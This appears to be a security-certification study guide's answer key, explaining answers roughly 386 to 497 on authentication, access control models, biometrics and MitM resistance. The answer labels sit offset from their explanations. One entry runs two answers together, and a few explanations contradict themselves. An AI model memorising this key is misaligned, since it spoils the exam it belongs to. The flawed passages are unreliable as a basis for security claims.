A. Entropy is the uncertainty of a random variable. Tokens that generate high entropy authenticators prevent online guessing of secret tokens registered to a legitimate claimant and offline cracking of tokens. The other three choices cannot prevent online guessing of tokens or passwords.

Answer 386

B. In token duplication, the subscriber’s token has been copied with or without the subscriber’s knowledge. A countermeasure is to use hardware cryptographic tokens that are difficult to duplicate. Physical security mechanisms can also be used to protect a stolen token from duplication because they provide tamper evidence, detection, and response capabilities. The other three choices cannot handle a duplicate tokens problem.

Answer 387

C. A countermeasure to mitigate the eavesdropping threat is to use tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator. The other choices are incorrect because they cannot provide dynamic authentication.

Answer 388

B. All users accessing an organization’s information systems must be uniquely identified and authenticated. Identifier management is applicable to local user accounts where the account is valid only on a local computer, and its identity can be traced to an individual. Identifier management is not applicable to shared information system accounts, such as group, guest, default, blank, anonymous, and nonspecific user accounts.

Answer 389

C. A countermeasure to mitigate the phishing or pharming threat is to use tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator. The other choices are incorrect because they cannot provide dynamic authentication. Phishing is tricking individuals into disclosing sensitive personal information through deceptive computer-based means. Phishing attacks use social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials. It involves Internet fraudsters who send spam or pop-up messages to lure personal information (e.g., credit card numbers, bank account information, social security numbers, passwords, or other sensitive information) from unsuspecting victims. Pharming is misdirecting users to fraudulent websites or proxy servers, typically through DNS hijacking or poisoning.

Answer 390

D. A countermeasure to mitigate the threat of token theft is to use multifactor tokens that need to be activated through a PIN or biometric. The other choices are incorrect because they cannot provide multifactor tokens.

Answer 391

C. A countermeasure to mitigate the social engineering threat is to use tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator. The other choices are incorrect because they cannot provide dynamic authentication.

Answer 392

B. Out-of-band tokens can be used to verify proof-of-possession of registered devices (e.g., cell phones) or identifiers (e.g., e-mail IDs). The other three choices cannot verify proof-of-possession. Lookup secret tokens can be copied. Some tokens can lock up after a number of repeated failed activation attempts. Physical security mechanisms can be used to protect a stolen token from duplication because they provide tamper evidence, detection, and response capabilities.

Answer 393

B. Unencrypted password files and unsigned public key certificates are examples of weakly bound credentials. The association between the identity and the token within a weakly bound credential can be readily undone, and a new association can be readily created. For example, a password file is a weakly-bound credential because anyone who has “write” access to the password file can potentially update the association contained within the file.

Answer 394

D. Signed password files and signed public key certificates are examples of strongly bound credentials. The association between the identity and the token within a strongly bound credential cannot be easily undone. For example a digital signature binds the identity to the public key in a public key certificate; tampering of this signature can be easily detected through signature verification.

Answer 395

B. Authorization controls such as access control matrices and capability tests are a part of preventive controls because they block unauthorized access. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.

Answer 396

C. The credential service provider (CSP) is the only one responsible for maintaining the credential in storage. The verifier and the CSP may or may not belong to the same entity. The other three choices are incorrect because they are not applicable to the situation here.

Answer 397

B. Privilege management is defined as a process that creates, manages, and stores the attributes and policies needed to establish criteria that can be used to decide whether an authenticated entity’s request for access to some resource should be granted. Privilege management is conceptually split into two parts: attribute management and policy management. The attribute management is further defined in terms of entity attributes, resource attributes, and environment attributes. Similarly, the policy management is further defined in terms of entity policies, resource policies, and environment policies.

Answer 398

A. The extensible access control markup language (XACML) is a standard for managing access control policy and supports the enterprise-level privilege management. It includes a policy language and a query language. However, XACML does not define authority delegation and trust management.

Answer 399

D. Some intrusion detection and prevention system (IDPS) sensors have a learning mode or simulation mode that suppresses all prevention actions and instead indicates when a prevention action should have been performed. This ability enables administrators to monitor and fine-tune the configuration of the prevention capabilities before enabling prevention actions, which reduces the risk of inadvertently blocking benign activity. Alerts can be enabled or disabled later

Answer 400

C. A protocol is said to have weak resistance to MitM attacks if it provides a mechanism for the claimant to determine whether he is interacting with the real verifier, but still leaves the opportunity for the nonvigilant claimant to reveal a token authenticator to an unauthorized party that can be used to masquerade as the claimant to the real verifier. For example, sending a password over server authenticated transport layer security (TLS) is weakly resistant to MitM attacks. The browser enables the claimant to verify the identity of the verifier; however, if the claimant is not sufficiently vigilant, the password will be revealed to an unauthorized party who can abuse the information. The other three choices do not deal with MitM attacks, but they can enhance the overall electronic authentication process. An account lockout mechanism is implemented on the verifier to prevent online guessing of passwords by an attacker who tries to authenticate as a legitimate claimant. Random data and nonce can be used to disguise the real data.

Answer 401

D. A protocol is said to be highly resistant to man-in-the-middle (MitM) attacks if it does not enable the claimant to reveal, to an attacker masquerading as the verifier, information (e.g., token secrets and authenticators) that can be used by the latter to masquerade as the true claimant to the real verifier. For example, in client authenticated transport layer security (TLS), the browser and the Web server authenticate one another using public key infrastructure (PKI) credentials, thus strongly resistant to MitM attacks. The other three choices are incorrect, because they are examples of being weakly resistant to MitM attacks and are examples of zero-knowledge password protocol where the claimant is authenticated to a verifier without disclosing the token secret.

Answer 402

D. In a cross site scripting (XSS) vulnerability, an attacker may use an extensible markup language (XML) injection to perform the equivalent of an XSS, in which requesters of a valid Web service have their requests transparently rerouted to an attacker-controlled Web service that performs malicious operations. To prevent XSS vulnerabilities, the relying party should sanitize inputs from claimants or subscribers to ensure they are not executable, or at the very least not malicious, before displaying them as content to the subscriber’s browser. The other three choices are incorrect because they are not applicable to the situation here.

Answer 403

A. A cross site request forgery (CSRF) is a type of session hijacking attack where a malicious website contains a link to the URL of the legitimate relying party. Web applications, even those protected by secure sockets layer/transport layer security (SSL/TLS), can still be vulnerable to the CSRF attack. One control to protect the CSRF attack is by inserting random data, supplied by the relying party, into any linked uniform resource locator with side effects and into a hidden field within any form on the relying party’s website. Generating a persession shared secret is effective against a session hijacking problem. Sanitizing inputs to make them nonexecutable is effective against cross site scripting (XSS) attacks, not CSRF attacks.

Answer 404

A. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. To mitigate the threat of assertion manufacture and/or modification, the assertion may be digitally signed by the verifier and the assertion sent over a protected channel such as TLS/SSL. The other three choices are incorrect because they are not applicable to the situation here.

Answer 405

B. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. To mitigate the threat of assertion reuse, the assertion should include a timestamp and a short lifetime of validity. The other three choices are incorrect because they are not applicable to the situation here.

Answer 406

C. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. To mitigate the threat of assertion repudiation, the assertion may be digitally signed by the verifier using a key that supports nonrepudiation. The other three choices are incorrect because they are not applicable to the situation here.

Answer 407

D. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. To mitigate the threat of assertion substitution, the assertion may include a combination of HTTP to handle message order and TLS to detect and disallow malicious reordering of packets. The other three choices are incorrect because they are not applicable to the situation here.

Answer 408

B. Proof-by-knowledge is where a claimant authenticates his identity to a verifier by the use of a password or PIN (i.e., something you know) that he has knowledge of. Proof-by-possession and proof-by-property, along with proof-byknowledge, are used in mobile device authentication and robust authentication. Proof-of-origin is the basis to prove an assertion. For example, a private signature key is used to generate digital signatures as a proof-of-origin.

Answer 409

A. Vulnerabilities typically result when an untrusted individual is granted unauthorized access to a system. Granting unauthorized access is riskier than granting authorized access to an untrusted individual, and trusted individuals are better than untrusted individuals. Both trust and authorization are important to minimize vulnerabilities. The other three choices are incorrect because serious vulnerabilities may not exist with them.

Answer 410

C. Proof-by-property is where a claimant authenticates his identity to a verifier by the use of a biometric sample such as fingerprints (i.e., something you are). Proof-by-possession and proof-by-knowledge, along with proof-by property, are used in mobile device authentication and robust authentication. Proof-of-origin is the basis to prove an assertion. For example, a private signature key is used to generate digital signatures as a proof-of-origin.

Answer 411

B. All the accounts mentioned in the question can be disabled, notified, or terminated, but it is not effective. Auditing of account creation, modification, notification, disabling, and termination (i.e., the entire account cycle) is effective because it can identify anomalies in the account cycle process.

Answer 412

B. Dual authorization mechanisms require two forms of approval to execute. The organization should not employ a dual authorization mechanism when an immediate response is necessary to ensure public and environmental safety because it could slow down the needed response. The other three choices are appropriate when an immediate response is necessary.

Answer 413

A. Nondiscretionary access control policies have rules that are not established at the discretion of the user. These controls can be changed only through administrative action and not by users. An identity-based access control (IBAC) decision grants or denies a request based on the presence of an entity on an access control list (ACL). IBAC and discretionary access control are considered equivalent and are not examples of nondiscretionary access controls. The other three choices are examples of nondiscretionary access controls. Mandatory access control deals with rules, role-based access control deals with job titles and functions, and temporal constraints deal with time-based restrictions and control time-sensitive activities.

Answer 414

B. Secure, non-operable system states are states in which the information system is not performing business-related processing. These states include offline for maintenance, troubleshooting, bootup, and shutdown. Offline data should be stored with encryption in a secure location. Removing information from online storage to offline storage eliminates the possibility of individuals gaining unauthorized access to that information via a network.

Answer 415

C. Unstructured data consists of two basic categories: bitmap objects (e.g., image, audio, and video files) and textual objects (e.g., emails and spreadsheets). Security policy filters include file type checking filters, dirty word filters, structured and unstructured data filters, metadata content filters, and hidden content filters.

Answer 416

C. Packet filters are based on header information whereas message filters are based on content using keyword searches. Both packet filters and message filters use rulesets. Structured data filters and metadata content filters do not use rulesets.

Answer 417

A. Information flow enforcement using explicit security attributes are used to control the release of certain types of information such as sensitive data. Data content, data structure, and source and destination objects are examples of implicit security attributes.

Answer 418

C. Policy enforcement mechanisms include the filtering and/or sanitization rules that are applied to information prior to transfer to a different security domain. Embedding rules and release rules do not handle information transfer.

Answer 419

B. Parsing transfer files facilitates policy decisions on source, destination, certificates, classification subject, or attachments. The other three choices are examples of policy rules for cross domain transfers.

Answer 420

D. The information system, when transferring information between different security domains, implements security policy filters that constrain file lengths, character sets, schemas, data structures, and allowed enumerations to reduce the range of potential malicious and/or unsanctioned content.

Answer 421

A. One-way flows are implemented using hardware mechanisms for controlling the flow of information within a system and between interconnected systems. As such they cannot detect unsanctioned information. The other three choices do detect unsanctioned information and prohibit the transfer with actions such as checking all transferred information for malware, implementing dirty word list searches on transferred information, and applying security attributes to metadata that are similar to information payloads.

Answer 422

B. Means to bind and enforce the information flow include resolution labels that distinguish between information systems and their specific components, and between individuals involved in preparing, sending, receiving, or disseminating information. The other three types of labels cannot bind security attributes to information.

Answer 423

B. Normal access enforcement mechanisms include access control lists, access control matrices, and cryptography. Increased information security is provided at the application system level (i.e., accounting and marketing systems) due to the use of password and PIN.

Answer 424

D. Specific architectural security solutions can reduce the potential for undiscovered vulnerabilities. These solutions include all four items mentioned.

Answer 425

B. Separation of duty constraints require that two roles be mutually exclusive because no user should have the privileges from both roles. Both role-based and rule-based access controls are examples of static separation of duty. Dynamic separation of duty is enforced at access time, and the decision to grant access refers to the past access history. Examples of dynamic separation of duty include workflow policy and the Chinese Wall policy.

Answer 426

C. The goal of biometrics-based identification and authentication techniques about biometric errors is to obtain low numbers for both false rejection rate and false acceptance rate errors. Another goal is to obtain a low crossover error rate because it represents high accuracy or a high crossover error rate because it represents low accuracy.

Answer 427

D. User-selected passwords generally contain less entropy, are easier for users to remember, use weaker passwords, and at the same time are easier for attackers to guess or crack.

Answer 428

D. A common architecture for single sign-on (SSO) is to have an authentication service, such as Kerberos, for authenticating SSO users, and a database or directory service such as lightweight directory access protocol (LDAP) that stores authentication information for the resources the SSO handles authentication for. By definition, the SSO technology uses a password, and an SSO solution usually includes one or more centralized servers containing authentication credentials for many users. Such a server becomes a single point-of-failure for authentication to many resources, so the availability of the server affects the availability of all the resources that rely on that server.

Answer 429

A. User authentication to the single sign-on (SSO) technology is important. If proper mutual authentication is not performed, the SSO technology using passwords is vulnerable to a man-in-the-middle (MitM) attack. Social engineering and phishing attacks are based on passwords, and replay attacks do not use passwords.

Answer 430

A. The two-person rule states that the first user can be any authorized user, but the second user can be any authorized user different from the first. History-based separation of duty regulates that the same subject (role or user) cannot access the same object (program or device) for a variable number of times. Design-time and run-time are used in the workflow policy.

Answer 431

A. The Chinese Wall policy is used where company sensitive information (i.e., confidentiality) is divided into mutually disjointed conflict-of-interest categories. The Biba model focuses on integrity. Availability, assurance, and integrity are other components of security principles that are not relevant to the Chinese Wall policy.

Answer 432

B. The goal of workflow policy is to maintain consistency between the internal data and external (users’) expectations of that data. This is because the workflow is a process, consisting of tasks, documents, and data. The Chinese Wall policy deals with dividing sensitive data into separate categories. The security policy and the access control policy are too general to be of any importance here.

Answer 433

B. Computer systems must be designed and developed with security and safety in mind because unsecure and unsafe systems can cause injury to people and damage to assets (e.g., military and airline systems). With separation of duty (SOD), fraud can be minimized when sensitive tasks are separated from each other (e.g., signing a check from requesting a check). Reliability is more of an engineering term in that a computer system is expected to perform with the required precision on a consistent basis. On the other hand, SOD deals with people and their work-related actions, which are not precise and consistent.

Answer 434

D. If complete trust by a principal is not practical, there is a possibility of a safety violation. The separation of duty concept is used to enforce safety and security in some access control models. In an event where there are many users (subjects), objects, and relations between subjects and objects, safety needs to be carefully considered.

Answer 435

C. The separation of duty concept is not enforced by the access control matrix model because it is not safety configured and is based on an arbitrary constraint. The other three choices use restricted access control models with access constraints that describe the safety requirements of any configuration.

Answer 436

A. A static exclusivity problem is the condition for which it is considered dangerous for any user to gain authorization for a conflicting set of access capabilities. The motivation for exclusivity relations includes reducing the likelihood of fraud or preventing the loss of user objectivity. The assurance principle deals with committing fraud or collusion when many users are involved in handling a business transaction.

Answer 437

D. The concept of limiting access or least privilege is simply to provide no more authorization than necessary to perform required functions. Best practice suggests it is better to have several administrators with limited access to security resources rather than one administrator with super-user access permissions. The principle of least privilege is connected to the role-based access control in that each role is assigned those access permissions needed to perform its functions, as mentioned in the other three choices.

Answer 438

C. The goal is to limit exposure due to operating from within a privileged account or role. A change of role for a user or process should provide the same degree of assurance in the change of access authorizations for that user or process. The same degree of assurance is also needed when a change between a privileged account and nonprivileged account takes place. Auditing of privileged accounts is required mostly to ensure that privileged account users use only the privileged accounts and that non-privileged account users use only the non-privileged accounts. An audit is not required for public access accounts due to little or no risk involved. Privileged accounts are riskier than nonpublic accounts.

Answer 439

C. The ability to identify source and destination points for information flowing in an information system allows for forensic reconstruction of events and increases compliance to security policies. Security attributes are critical components of the operations security concept.

Answer 440

D. Privileged user accounts should be established and administered in accordance with a role-based access scheme to access security functions. Privileged roles include network administration, security administration, system administration, database administration, and Web administration, and should be given access to security functions. End users and internal auditors should not be given a privileged account to access security functions during the course of normal operations.

Answer 441

A. Service-oriented architecture (SOA) implementations rely on run-time access control decisions facilitated by dynamic privilege management. In contrast, conventional access control implementations employ static information accounts and predefined sets of user privileges. Although user identities remain relatively constant over time, user privileges may change more frequently based on the ongoing business requirements and operational needs of the organization.

Answer 442

C. Privilege management is defined as a process that creates, manages, and stores the attributes and policies needed to establish criteria that can be used to decide whether an authenticated entity’s request for access to some resource should be granted. Authentication management deals with identities, credentials, and any other authentication data needed to establish an identity. Access management, which includes privilege management and access control, encompasses the science and technology of creating, assigning, storing, and accessing attributes and policies. These attributes and policies are used to decide whether an entity’s request for access should be allowed or denied. In other words, a typical access decision starts with authentication management and ends with access management, whereas privilege management falls in between.

Answer 443

B. Super user accounts are typically described as administrator or root accounts. Access to super user accounts should be limited to designated security and system administration staff only, and not to the end-user accounts, guest accounts, anonymous accounts, or temporary accounts. Security and system administration staff use the super user accounts to access key security/system parameters and commands.

Answer 444

C. Response to unsuccessful login attempts can be implemented at both the operating system and the application system levels. The session lock is implemented typically at the operating system level but may be at the application system level. Hardware and firmware are not used for unsuccessful login attempts and session lock.

Answer 445

A. A session lock prevents further access to an information system after a defined time period of inactivity. A session lock is not a substitute for logging out of the system as in logging out at the end of the workday. The other three choices are true statements about a session lock.

Answer 446

C. Access to public websites and emergency situations are examples of user permitted actions that don't require identification or authentication. Both unsuccessful login attempts and reestablishing a session lock require proper identification or authentication procedures. A session lock is retained until proper identification or authentication is submitted, accepted, and reestablished..

Answer 447

A. Additional security protection is needed for a mobile device (e.g., PDA) requiring a login where the login is made to the mobile device itself, not to any one account on the device. Additional protection is not needed when removable media is accessed without a login and when the information on the mobile device is encrypted. A successful login to any account on the mobile device resets the unsuccessful login count to zero.

Answer 448

B. An information system dynamically reconfigures security attributes in accordance with an identified security policy as information is created and combined. The system supports and maintains the binding of security attributes to information in storage, in process, and in transmission. The term security label is often used to associate a set of security attributes with a specific information object as part of the data structures (e.g., records, buffers, and files) for that object.

Answer 449

A. International standards for access control decisions do not use the U.S.-based discretionary or mandatory access control policies. Instead, they use identity-based and rule-based access control policies.

Answer 450

D. An organization must ensure that remote access sessions for accessing security functions employ security measures and that they are audited. Bulk encryption, session layer encryption, secure shell-2 (SSH-2), and virtual private networking (VPN) with blocking enabled are standard security measures. Bluetooth and peer-to-peer (P2P) networking are examples of less than secure networking protocols.

Answer 451

D. Actions that may be taken to confine wireless communication to organization-controlled boundaries include all the four items mentioned. Mutual authentication protocols include EAP/TLS and PEAP. Reducing the power of the wireless transmission means that the transmission cannot go beyond the physical perimeter of the organization. It also includes installing TEMPEST measures to control emanations.

Answer 452

C. An identifiable owner (e.g., employee, organization, or project) for removable media helps to reduce the risk of using such technology by assigning responsibility and accountability for addressing known vulnerabilities in the media (e.g., malicious code insertion). Use of project-owned removable media is acceptable because the media is assigned to a project, and the other three choices are not acceptable because they have no accountability feature attached to them. Restricting the use of writable, removable media is a good security practice.

Answer 453

D. When unclassified mobile devices are connected to classified systems containing classified information, it is a risky situation because a security policy is violated. This action should trigger an incident response handling process. Connection of an unclassified mobile device to an unclassified system still requires an approval; although, it is less risky. Use of internal or external modems or wireless interfaces within the mobile device should be prohibited.

Answer 454

D. Organizations can utilize network scanning tools, intrusion detection and prevention systems (IDPS), endpoint protections such as firewalls, and host-based intrusion detection systems to identify and prevent the use of prohibited functions, ports, protocols, and services.

Answer 455

D. An information system must use multifactor authentication mechanisms for both network access (privileged and non-privileged) and local access (privileged and non-privileged) because both situations are risky. System/network administrators have administrative (privileged) accounts, and these individuals have access to a set of “access rights” on a given system. Malicious non-privileged account users are as risky as privileged account users because they can cause damage to data and program files.

Answer 456

D. You need to require that individuals are authenticated with an individual authenticator prior to using a group authenticator. The other three choices are true statements.

Answer 457

D. An authentication process resists replay attacks if it is impractical to achieve a successful authentication by recording and replaying a previous authentication message. Techniques used to address the replay attacks include protocols that use nonces or challenges (e.g., TLS) and time synchronous or challenge-response one-time authenticators.

Answer 458

A. For dynamic address allocation for devices, dynamic host configuration protocol (DHCP)-enabled clients obtain leases for Internet Protocol (IP) addresses from DHCP servers. Therefore, the dynamic address allocation process for devices is standardized with DHCP. The other three choices do not have the capability to obtain leases for IP addresses.

Answer 459

C. Conventional approaches to identifications and authentications employ static information system accounts for known preregistered users. Service-oriented architecture (SOA) implementations do not rely on static identities but do rely on establishing identities at run-time for entities (i.e., dynamic identities) that were previously unknown. Dynamic identities are associated with dynamic attributes and privileges as they rely on pre-established trust relationships.

Answer 460

B. Organizations should change the default authenticators upon information system installation or require vendors and/or manufacturers to provide unique authenticators prior to delivery. This is because default authenticator credentials are often well known, easily discoverable, and present a significant security risk, and therefore, should be changed upon installation. A stored or embedded authenticator can be risky depending on whether it is encrypted or unencrypted. Both reused and refreshed authenticators are less risky compared to default and stored authenticators because they are under the control of the user organization.

Answer 461

C. Examples of user identifiers include internal users, contractors, external users, guests, passwords, tokens, and biometrics. Examples of user authenticators include passwords, PINs, tokens, biometrics, PKI/digital certificates, and key cards. When an individual has accounts on multiple information systems, there is the risk that if one account is compromised and the individual uses the same user identifier and authenticator, other accounts will be compromised as well. Possible alternatives include (i) having the same user identifier but different authenticators on all systems, (ii) having different user identifiers and different user authenticators on each system, (iii) employing a single sign-on mechanism, or (iv) having one-time passwords on all systems.

Answer 462

D. It is less risky to dynamically manage identifiers, attributes, and access authorizations. Run-time identifiers are created on-the-fly for previously unknown entities. Information security management should ensure that unencrypted, static authenticators are not embedded in application systems or access scripts or not stored on function keys. This is because these approaches are risky. Here, the concern is to determine whether an embedded or stored authenticator is in the encrypted or unencrypted form.

Answer 463

A. An organization employs a deny-all, permit-by-exception authorization policy to identify software not allowed to execute on the system. The other three choices are incorrect because the correct answer is based on specific access authorization policy.

Answer 464

B. Encryption prevents unauthorized access and protects data and programs when they are in storage (at rest) or in transit. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.

Answer 465

A. Examples of managed interfaces employing boundary protection devices include proxies, gateways, routers, firewalls, hardware/software guards, and encrypted tunnels on a demilitarized zone (DMZ). This policy “deny-all, permit-by-exception” denies network traffic by default and enables network traffic by exception only. The other three choices are incorrect because the correct answer is based on specific access authorization policy. Access control lists (ACL) can be applied to traffic entering the internal network from external sources.

Answer 466

D. When the enforcement of normal security policies, procedures, and rules is difficult, it takes on a different dimension from that of requiring contracts, separation of duties, and system access controls. Under these situations, compensating controls in the form of close supervision, followed by peer and team review of quality of work are needed101. a. An information system authenticates devices before establishing remote and wireless network connections using bidirectional authentication between devices that are cryptographically-based. Examples of device identifiers include media access control (MAC) addresses, IP addresses, e-mail IDs, and device unique token identifiers. Examples of device authenticators include digital/PKI certificates and passwords. The other three choices are not correct because they lack two-way authentication.

Answer 467

B. A protection-state is that part of the system-state critical to understanding an access control policy. A system must be either in a protection-state or reachable-state. User-state is not critical because it is the least privileged mode.

Answer 468

A. DES is weak and should not be used because of several documented security weaknesses. The other three choices can be used. AES can be used because it is strong. RSA is used in key transport where the authentication server generates the user symmetric key and sends the key to the client. DH is used in key agreement between the authentication server and the client.

Answer 469

B. When failures occur due to flaws in permission-based systems, they tend to fail-safe with permission denied. There are two types of access control decisions: permission-based and exclusion-based.

Answer 470

B. Host and application system hardening procedures are a part of preventive controls, as they include antivirus software, firewalls, and user account management. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.

Answer 471

C. Fail-safe defaults mean that access control decisions should be based on permit and allow policy (i.e., permission rather than exclusion). This equates to the condition in which lack of access is the default (i.e., no access, yes default). “Allow all and deny-by-default” refers to yes-access, yes-default situations.

Answer 472

D. Automatically generated random (or pseudo-random) passwords usually provide greater entropy, are hard for attackers to guess or crack, stronger passwords, but at the same time are hard for users to remember.

Answer 473

C. The trick is balancing the trade-off between the false acceptance rate (FAR) and false rejection rate (FRR). A high FAR means that security is unacceptably weak. A FAR is the probability that a biometric system can incorrectly identify an individual or fail to reject an imposter. The FAR given normally assumes passive imposter attempts, and a low FAR is better. The FAR is stated as the ratio of the number of false acceptances divided by the number of identification attempts. An FRR is the probability that a biometric system will fail to identify an individual or verify the legitimate claimed identity of an individual. A low FRR is better. The FRR is stated as the ratio of the number of false rejections divided by the number of identification attempts.

Answer 474

D. A high false rejection rate (FRR) means that the technology is creating a (PP) nuisance to falsely rejected users thereby undermining user acceptance and questioning the viability of the technology used. This could also mean that the technology is obsolete, inappropriate, and/or not meeting the user’s changing needs. A false acceptance rate (FAR) is the probability that a biometric system will incorrectly identify an individual or fail to reject an imposter. The FAR given normally assumes passive imposter attempts, and a low FAR is better and a high FAR is an indication of a poorly operating biometric system, not related to technology. The FAR is stated as the ratio of the number of false acceptances divided by the number of identification attempts. A FRR is the probability that a biometric system will fail to identify an individual or verify the legitimate claimed identity of an individual. A low FRR is better. The FRR is stated as the ratio of the number of false rejections divided by the number of identification attempts.

Answer 475

A. An adversary may present something other than his own biometric to trick the system into verifying someone else’s identity, known as spoofing. One type of mitigation for an identity spoofing threat is liveness detection (e.g., pulse or lip reading). The other three choices cannot perform liveness detection.

Answer 476

B. Attackers can use residual data on the biometric reader or in memory to impersonate someone who authenticated previously. Cryptographic methods such as digital signatures can prevent attackers from inserting or swapping biometric data without detection. The other three choices do not provide cryptographic measures to prevent impersonation attacks.

Answer 477

C. A replay attack occurs when someone can capture a valid user’s biometric data and use it at a later time for unauthorized access. A potential solution is to reject exact matches, thereby requiring the user to provide another biometric sample. The other three choices do not provide exact matches.

Answer 478

D. It is good to limit the number of attempts any user can unsuccessfully attempt to authenticate. A session lock should be placed where the system locks the user out and logs a security event whenever a user exceeds a certain amount of failed logon attempts within a specified timeframe. The other three choices cannot stop unsuccessful authentication attempts. For example, if an adversary can repeatedly submit fake biometric data hoping for an exact match, it creates a security breach without a session lock. In addition, rejecting exact matches creates ill will with the genuine user.

Answer 479

B. Timestamps or other mechanisms to thwart replay attacks should be included in the single sign-on (SSO) credential transmissions. Man-in-the-middle (MitM) attacks are based on authentication and social engineering, and phishing attacks are based on passwords.

Answer 480

A. This combination of authentication represents something that you know (PIN) and something that you are (biometric). At the authentication system prompt, the user enters the PIN and then submits a biometric live-captured sample. The system compares the biometric sample to the biometric reference data associated with the PIN entered, which is a one-to-one matching of biometric verification. The other three choices are incorrect because the correct answer is based on its definition.

Answer 481

B. This combination of authentication represents something that you know (PIN) and something that you are (biometric). The user presents a biometric sample first to the sensor, and the system conducts a one-to-many matching of biometric identification. The user is prompted to supply a PIN that provided the biometric reference data. The other three choices are incorrect because the correct answer is based on its definition.

Answer 482

B. The biometric identification with one-to-many matching can result in slow system response times and can be more expensive depending on the size of the biometric database. That is, the larger the database size, the slower the system response time. A personal identification number (PIN) is entered as a second authentication factor, and the matching is slow.

Answer 483

A. The biometric verification with one-to-one matching can result in faster system response times and can be less expensive because the personal identification number (PIN) is entered as a first authenticator and the matching is quick.

Answer 484

C. This combination represents something that you have (i.e., hardware token) and something that you know (i.e., PIN). The hardware token can be lost or stolen. Therefore, this is a weak form of two-factor authentication that can be used to support unattended access controls for physical access only. Logical access controls are software based and as such do not support a hardware token.

Answer 485

D. This combination represents something that you have (i.e., PKI keys) and something that you know (i.e., PIN). There is no hardware token to lose or steal. Therefore, this is a strong form of two-factor authentication that can be used to support logical access.

Answer 486

D. Identity-based access control (IBAC) and discretionary access control (DAC) are considered equivalent. The rule-based access control (RuBAC) and mandatory access control (MAC) are considered equivalent. IBAC uses access control lists (ACLs) whereas RuBAC does not.

Answer 487

B. Most network operating systems are implemented with an identity-based access control (IBAC) policy. Entities are granted access to resources based on any identity established during network logon, which is compared with one or more access control lists (ACLs). These lists may be individually administered, may be centrally administered and distributed to individual locations, or may reside on one or more central servers. Attribute-based access control (ABAC) deals with subjects and objects, rule-based (RuBAC) deals with rules, and role-based (RBAC) deals with roles or job functions.

Answer 488

C. Role-based access control policy (RBAC) is a composite access control policy between identity-based access control (IBAC) policy and rule-based access control (RuBAC) policy and should be considered as a variant of both. In this case, an identity is assigned to a group that has been granted authorizations. Identities can be members of one or more groups.

Answer 489

B. This situation illustrates that multiple instances of the same factor (i.e., something you have is used two times) results in one-factor authentication. When this is combined with something you know, it results in a two-factor authentication scheme.

Answer 490

B. Remote access controls are a part of preventive controls, as they include Internet Protocol (IP) packet filtering by border routers and firewalls using access control lists. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.

Answer 491

B. Requiring two different passwords for accessing two different systems in the same session is more secure than requiring one password for two different systems. This equates to two-factor authentication. Requiring multiple proofs of authentication presents multiple barriers to entry access by intruders. On the other hand, using the same password (one-factor) for accessing multiple systems in the same session is a one-factor authentication, because only one type (and the same type) of proof is used. The key point is whether the type of proof presented is same or different.

Answer 492

B. On the surface, this situation may seem a three-factor authentication, but in reality it is a two-factor authentication, because only a card (proof of one factor) and PIN (proof of second factor) are used, resulting in a two-factor authentication. Note that it is not the strongest two-factor authentication because of the attended access. A security guard is an example of attended access, who is checking for the validity of the card, and is counted as one-factor authentication. Other examples of attended access include peers, colleagues, and supervisors who will vouch for the identify of a visitor who is accessing physical facilities.

Answer 493

D. Tracking the driver’s physical location (perhaps with GPS or wireless sensor network) is an example of somewhere you are (proof of first factor). Showing the employee a physical badge with photo ID is an example of something you have (proof of second factor). Entering a password and PIN is an example of something you know (proof of third factor). Taking a biometric sample of fingerprint is an example of something you are (proof of fourth factor). Therefore, this scenario represents a four-factor authentication. The key point is that it does not matter whether the proof presented is one item or more items in the same category (e.g, somewhere you are, something you have, something you know, and something you are).

Answer 494

A. Least assurance is achieved when two authentication proofs of something that you have (e.g., card, key, and mobile ID device) are implemented because the card and the key can be lost or stolen. Consequently, multiple uses of something that you have offer lesser access control assurance than using a combination of multifactor authentication techniques. Equivalent assurance is neutral and does not require any further action.

Answer 495

B. Increased assurance is achieved when two authentication proofs of something that you know (e.g., using two different passwords with or without PINs) are implemented. Multiple proofs of something that you know offer greater assurance than does multiple proofs of something that you have. However, multiple uses of something that you know provide equivalent assurance to a combination of multifactor authentication techniques.

Answer 496

C. Maximum assurance is achieved when two authentication proofs of something that you are (e.g., personal recognition by a colleague, user, or guard, and a biometric verification check) are implemented. Multiple proofs of something that you are offer the greatest assurance than does multiple proofs of something that you have or something that you know, used either alone or combined. Equivalent assurance is neutral and does not require any further action.

Answer 497

